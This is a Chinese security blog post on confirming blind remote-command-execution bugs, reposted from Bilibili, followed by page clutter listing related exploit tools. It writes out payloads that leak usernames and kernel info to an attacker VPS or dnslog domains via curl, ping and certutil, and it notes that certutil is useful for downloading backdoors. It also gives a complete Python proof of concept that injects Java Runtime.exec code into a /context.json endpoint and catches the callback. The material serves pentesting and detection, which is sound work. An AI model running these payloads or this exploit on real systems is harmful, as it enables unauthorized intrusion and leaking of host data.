在检测RCE漏洞时,判断RCE利用成功的方式有哪些(无回显情况)

最新推荐文章于 2024-05-28 10:56:28 发布
最新推荐文章于 2024-05-28 10:56:28 发布
阅读量2k 收藏 6
点赞数 1
文章标签: windows python
原文链接:https://www.bilibili.com/read/cv9614552/
版权

第一种使用VPS:

curl "xxx.xxx.xxx.xxx/$(uname -a | awk '{print $1}')"

这条命令拼接了两处,第一处便是curl下我的一个vps服务器的80端口,第二处是显示内核版本。从服务器的web日志文件中看下效果:
在这里插入图片描述
发现操作系统的版本被拼接输出到后面,在面对没有回显的RCE或者CSRF都可以使用这个技巧。

第二种:DNSlog

windows:

操作系统 盲注方式
windows %variable%
linux variable 反引号
此处使用公网一个 DVWA 靶场( Windows 系统搭建)为例进行演示,Payload:

ping %USERNAME%.u4f95y.dnslog.cn
certutil -urlcache -split -f http://随机数.dnslog域名
curl hhhh.xk4fm7.dnslog.cn 
(这里没有准备windows环境,大家可以自己搭建类似的RCE windows环境试试这个命令,很好用的一个下载后门的命令()) 
https://www.bilibili.com/read/cv9614552/ 出处:bilibili

在这里插入图片描述
Windows 常用变量:

//变量                 类型       描述
//%ALLUSERSPROFILE%   本地       返回“所有用户”配置文件的位置。
//%APPDATA%           本地       返回默认情况下应用程序存储数据的位置。
//%CD%                                                        本地       返回当前目录字符串。
//%CMDCMDLINE%        本地       返回用来启动当前的 Cmd.exe 的准确命令行。
//%CMDEXTVERSION%     系统       返回当前的“命令处理程序扩展”的版本号。
//%COMPUTERNAME%      系统       返回计算机的名称。
//%COMSPEC%           系统       返回命令行解释器可执行程序的准确路径。
//%DATE%              系统       返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息,请参阅 Date。
//%ERRORLEVEL%        系统       返回上一条命令的错误代码。通常用非零值表示错误。
//%HOMEDRIVE%         系统       返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
//%HOMEPATH%          系统       返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
//%HOMESHARE%         系统       返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
//%LOGONSERVER%       本地       返回验证当前登录会话的域控制器的名称。
//%NUMBER_OF_PROCESSORS%         系统      指定安装在计算机上的处理器的数目。
//%OS%                           系统      返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。
//%PATH%                         系统       指定可执行文件的搜索路径。
//%PATHEXT%                      系统       返回操作系统认为可执行的文件扩展名的列表。
//%PROCESSOR_ARCHITECTURE%       系统       返回处理器的芯片体系结构。值:x86 或 IA64(基于 Itanium)。
//%PROCESSOR_IDENTFIER%          系统       返回处理器说明。
//%PROCESSOR_LEVEL%              系统       返回计算机上安装的处理器的型号。
//%PROCESSOR_REVISION%           系统       返回处理器的版本号。
//%PROMPT%                       本地       返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。
//%RANDOM%                       系统       返回 032767 之间的任意十进制数字。由 Cmd.exe 生成。
//%SYSTEMDRIVE%                  系统       返回包含 Windows server operating system 根目录(即系统根目录)的驱动器。
//%SYSTEMROOT%                   系统       返回 Windows server operating system 根目录的位置。
//%TEMP%和%TMP%                  系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP,而其他应用程序则需要 TMP。
//%TIME%                         系统       返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息,请参阅 Time。
//%USERDOMAIN%           


        本地       返回包含用户帐户的域的名称。
//%USERNAME%                     本地       返回当前登录的用户的名称。
//%USERPROFILE%                  本地       返回当前用户的配置文件的位置。
//%WINDIR%                       系统       返回操作系统目录的位置。
linux

如果是 Linux 环境,则 Payload 对应的应该为:

ping `whoami`.u4f95y.dnslog.cn
curl 随机数.dnslog域名
wget 随机数.dnslog域名 
作者:掌控安全学院 https://www.bilibili.com/read/cv9614552/ 出处:bilibili

第三种:自带http服务器

使用python3自带的http.server服务(python2为SimpleHTTPServer)

直接cmd启动

python -m http.server 8001 #这里的端口随便定义

修改一下执行的命令curl http://10.0.13.174:8001/awda 这里的IP就是你启动服务的主机IP
在这里插入图片描述
注意!!!一定要关闭防火墙
0x03 POC编写
1.编写一个简单的dnslog类,方便我们调用

class Dnslog():
 def __init__(self):
     self.getdnssub_url = 'http://www.dnslog.cn/getdomain.php'
     self.getres_url = 'http://www.dnslog.cn/getrecords.php'
     self.headers = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X '
     }
     self.s = requests.session() #这里顶一个session,同一个session可以拿到之前获取到的子域名的日志啦

 def req(self):#获取请求到的dnslog随机子域名
     try:
         req = self.s.get(url=self.getdnssub_url,headers=self.headers,allow_redirects=False,verify=False,timeout=30)
         return req.text
     except:
         return None
 def res(self):#获取dnslog随机子域名的dns查询日志
     try:
         res = self.s.get(url=self.getres_url,headers=self.headers,allow_redirects=False,verify=False,timeout=30)
         return res.text
     except:
         return None

这个类内容很简单,就是获取www.dnglog.cn的子域名页面,拿到之后使用同一个session去访问dnslog日志即可

接下来我们写一下POC检测主程序,记得导入上面写的类,可以直接复制进去,也可以import方式导入,推荐import方式吧。方便以后扩展

#这里我们首先写一个用于监听端口的函数

def check_vul(ran_str,q,p): #启动socket TCP服务器
   i = 0
   while i < 10:  #防止端口冲突,加上一个循环,用于报错之后可以换新的端口
       try:
           i += 1
           host = '0.0.0.0'
           lport = random.randint(62000,62999)
           sk = socket.socket()
           sk.settimeout(25)
           # 开启地址复用
           sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
           sk.bind((host, lport))
           sk.listen(5)
           p.put(lport)
           break

       except Exception as msg:
           pass
   try:
       #print('wait for client port:' +  str(lport))
       time.sleep(10) #这里需要sleep一会儿不然速度太快conn中没有数据。
       conn, address = sk.accept()
       c_info = conn.recv(1024).decode('UTF-8')
       http_uri_get = c_info.split('\n')[0]
       if ran_str in http_uri_get:
           sk.close()
           q.put(http_uri_get)   #由于我们这里的函数需要通过多线程来启动,因此我们要拿到这个函数的返回值需要通过queue队列来传递过来
       else:
           sk.close()
           q.put(None)
   except Exception:
       q.put(None)

def payload(url,cmd): #为了介绍代码的重复利用,我们把发送payload这里写成一个函数,用来多次发送(针对不同的操作系统发送不同的payload)
   headers = {
       'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X ',
       'Content-Type': 'application/json'
   }
   json_data = {
       "filters": [
           {
               "id": "sample",
               "filters": [
                   {
                       "condition": {
                           "parameterValues": {
                               "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"{}\");".format(cmd)
                           },
                           "type": "profilePropertyCondition"
                       }
                   }
               ]
           }
       ],
       "sessionId": "sample"
   }
   requests.post(url=url, headers=headers, timeout=15, verify=False, allow_redirects=False, json=json_data) #verify=False用于忽略ssl证书验证

#这里是主函数

def exploit(url):
   urllib3.disable_warnings() #这里禁用掉ssl报错信息,防止访问https页面的时候会报ssl证书错误,
   try:
       ran_str = ''.join(random.sample(string.ascii_letters, 8)) #增加随机字符串,这里随机字符串主要用于RCE检测中提高检测准确率。
       payload_path = '/context.json'
       new_url = url + payload_path
       #提取url中的IP和PORT
       urlparse_oj = parse.urlparse(url)
       ip = urlparse_oj.hostname
       port=urlparse_oj.port
       try:
           iprule_re = re.compile('(10\x2e\d{1,3}\x2e\d{1,3}\x2e\d{1,3})|(172\x2e(1[6-9]|2[0-9]|3[0-1])\x2e\d{1,3}\x2e\d{1,3})|(192\x2e168\x2e\d{1,3}\x2e\d{1,3})') #做一个简单的内网IP地址判断,如果是内网IP,就使用socket tcpserver方法检测,否则使用dnslog检测
           iprule_res = iprule_re.search(ip).group(0)
           if bool(iprule_res) == True: #如何内网也想用IP地址判断,把这里的True改为False就ok
               # 启动回连线程
               q = Queue() #这个队列是用来接收漏洞判断结果的队列
               p = Queue() #这个队列是用来将socket随机端口传出来告诉给主程序的队列
               p3_check = Thread(target=check_vul, args=(ran_str, q, p))
               p3_check.start()
               # 获取本地IP和端口
               sock = socket.socket(socket.AF_INET) #新建一个socket队列用于判断自身IP地址,用于目标服务器回连命令的构造
               sock.connect((ip, int(port)))
               sock.settimeout(30)
               lhost = sock.getsockname()[0] #得到本地IP地址
               lport = p.get() #通过p队列拿到socket服务器的随机端口
               cmd_list = ['certutil -urlcache -split -f http://{}:{}/{}'.format(lhost, lport, ran_str),
                           'curl http://{}:{}/{}'.format(lhost, lport, ran_str)
                           ] #构造windows和linux的两种命令执行检测payload
               for cmd in cmd_list:
                   payload(new_url, cmd)  # 将newurl和构造的cmd命令传入payload函数,用于发送payload包。这里我们直接连续发送windows和linux两种payload包。只要收到对应的回应即可说明漏洞存在
               res = q.get()
               if ran_str in res: #这里针对生成的随机字符串和实际socket服务器拿到的随机字符串进行对比,一致即表示漏洞存在。(其实这个判断再上面check_vul函数已经判断过了,这里并没有特别一定要用的意义啦23333)
                   return new_url
               else:
                   return None
       except:
           pass
       else: #如果并非内网IP,我们执行dnslog的方式来判断
           dnslog_object = dnslog.Dnslog() #创建dnslog对象
           get_dnssub = dnslog_object.req() #获取dnslog的随机子域名
           cmd_list = ['certutil -urlcache -split -f http://{}.{}'.format(ran_str,get_dnssub),
                       'curl http://{}.{}'.format(ran_str,get_dnssub)
                       ] #一样的构造相应的RCE payload
           for cmd in cmd_list:
               payload(new_url, cmd)  # 与上面一样,发送payload数据包两遍
           time.sleep(10) #这里通过一个10s的等待,等待一下dnslog接收日志,时间可以根据实际网络情况来调整
           get_dnslog_res = dnslog_object.res()
           if ran_str in get_dnslog_res: #如果随机字符串在dnslog的日志中,就说明漏洞存在
               return new_url #返回漏洞url
           else:
               return None
   except Exception as e:
       print(e)
       return None

print(exploit('http://10.0.13.125:8181')) #执行测试

1.socket服务器回连
在这里插入图片描述
2.dnslog
在这里插入图片描述

本文参照连接:

https://www.sohu.com/a/428977805_99907709
https://www.bilibili.com/read/cv9614552/
冯·诺依曼
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
NGINX-RCE:nginx的rce漏洞利用
04-04
NGINX-RCE nginx的rce漏洞利用怎么运行呢? 首先只需使用gcc gcc expl0itz.c -o expl0itz 然后chmod chmod +x expl0itz 像二进制文件一样运行之后! ./expl0itz
rce回显带外
2301_79011934的博客
03-24 305
组合为ping 127.0.0.1 | powershell 由于创建变量需要powershell才可以所以要先启动powershell,因为whoami执行得到的结果里有\,\不能被ping当主机解析所以要替换掉。现在可以正常回显执行命令,更改源码,把这段注释掉,现在去执行命令已经没有回显了,那么我们如何判断命令有没有执行成功呢。| (管道符号) ||(逻辑或) &&(逻辑与) &(后台任务符号)| || & && ``(特有``和;这里我们使用dnslog进行记录。使用pikachu进行演示。
RCE篇之无回显rce
mingyqf的博客
01-13 1292
原文链接:http://arsenetang.com/2021/07/23/RCE%E7%AF%87%E4%B9%8B%E6%97%A0%E5%9B%9E%E6%98%BErce/
萌新小白对于ctf学习的笔记--CTF中的RCE
黑战士的博客
03-08 1099
以上就是我对于RCE学习的一个总结,其中也借鉴了很多网上大佬们的文章,也有视频学习的笔记。如果有不足,会很快改的。
rce(无回显
qq_62046696的博客
07-20 4023
RCE英文全称分为远程命令执行ping和远程代码执行evel。漏洞出现的原因没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。...
rce回显剖析
姜小孩的博客
12-12 4919
在ctf中,有会遇到无回显rce,就是说虽然可以进行命令执行,但却看不到命令执行的结果,也不知道命令是否被执行,借着这次总结rce的机会,就把它一起总结了
判断漏洞是否攻击成功
tlucky的博客
04-16 4870
判断是否攻击成功
RCE绕过之无回显
Ciyaso的博客
07-23 2861
①shell_exec等无回显函数。 判断方法: ls;sleep(3) 利用: Ⅰ.复制,压缩,写shell等方法 copy flag.php flag.txt mv flag.php flag.txt cat flag.php > flag.txt Ⅱ.压缩方法 tar cvf flag.tar flag.php #tar压缩 tar zcvf flag.tar.gz flag.php #tar解压 zip flag.zip flag.php #zip压缩 unzip flag.
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
Java-Rce-Echo:Java RCE回显测试代码
03-19
Java RCE回显 支持的回显测试代码 Linux通用回显 Windows通用回显 春天回显 Tomcat通用回显(已在6.0.10 / 6.0.53 / 7.0.34 / 7.0.54 / 7.0.70 / 7.0.96 / 7.0.104 / 8.0.18 / 8.0.32 / 8.0.48 / 8.5.12测试/...
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
带外攻击(OOB)RCE回显思路总结详解
qq_71467825的博客
06-23 1183
向服务器提交一个payload,而服务器响应给我们相关的response信息,大家都叫他带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成。传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方,协议能够将这些数据快速地发送到对方。为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据。
命令执行漏洞没有回显如何证明
Sgirll的博客
07-19 584
yakit自带dnslog平台,申请域名,执行命令,ping一下域名,
【Web】无回显RCE相关例题wp(1)
uuzeray的博客
11-13 351
这块还是很有嚼头的,准备分几次总结命令执行无回显rce思路:1.利用dnslog带外2.写马3.反弹shell4.写文件然后访问文件。
Jumpserver rce 漏洞检测方式
weixin_39811856的博客
02-04 676
1.通过对实验环境的测试,发现每天的日志会清除,所以如果是昨天进行操作的三个参数,今天是拿不到的(互联网环境可能不同,检测到部分互联网环境会保留半年左右的日志) 2.能否取到token 3.通过是互联网环境的探测,发现api报400的现象,也就是对该api进行了屏蔽 再根据升级的补丁(删除了user-only参数): 第二个修复路径是apps/ops/ws.py 这是一个websocket 连接端点,用来读取日志文件,修复方式是在connect函数内添加了身份认证代码。 也就是升级后无法.
Web安全—安全事件的分析思路详解(安全设备)
weixin_44431280的博客
03-18 3070
Web安全—安全事件的分析思路详解(安全设备) 分析思路: 一:判断事件真实性和准确性分析 a.判断事件是否是正常业务触发的告警 b.判断事件真实性,是否存在误报(是否存在恶意payload) 二:判断攻击是否成功 借助响应包,关联事件,相关会话日志(HTTP访问日志和会话日志)判断攻击者当次攻击是否成功 三:判断主机是否有异常行为 以被攻击IP为源IP进行事件查询,查看是否存在异常行为或对其他主机的攻击行为 ...
网络安全笔记 -- RCE代码及命令执行漏洞
swy66的博客
09-11 1577
RCE代码及命令执行漏洞
CLIP 源码分析:simple_tokenizer.py
最新发布
qq_53324833的博客
05-28 387
不难发现,simple_tokenizer.py 这个文件模块就是用来处理我们输入的文本数据的,主要是一些编码上的处理、文本数据的清洗以及文本格式的转换。在最后我们会手动 debug 走一遍流程,看看该项目的各个部分到底是怎么做的都负责了什么。
pikachu靶场RCE漏洞
10-13
这是一个关于Pikachu靶场的RCE漏洞的问题。Pikachu靶场是一个用于渗透测试和漏洞研究的虚拟机,而RCE漏洞则是一种远程代码执行漏洞,攻击者可以利用漏洞在受害者系统上执行任意代码。 针对这个问题,我建议您可以参考以下步骤来修复该漏洞: 1. 确认漏洞是否存在:可以通过手动或自动化的方式对系统进行扫描,以确认是否存在该漏洞。 2. 更新相关软件:如果发现存在漏洞,应及更新相关软件版本,以修复漏洞。 3. 配置安全策略:可以通过配置安全策略来限制攻击者对系统的访问权限,从而减少漏洞利用的风险。 4. 加强监控:可以通过加强监控来及发现并阻止攻击行为,从而保护系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值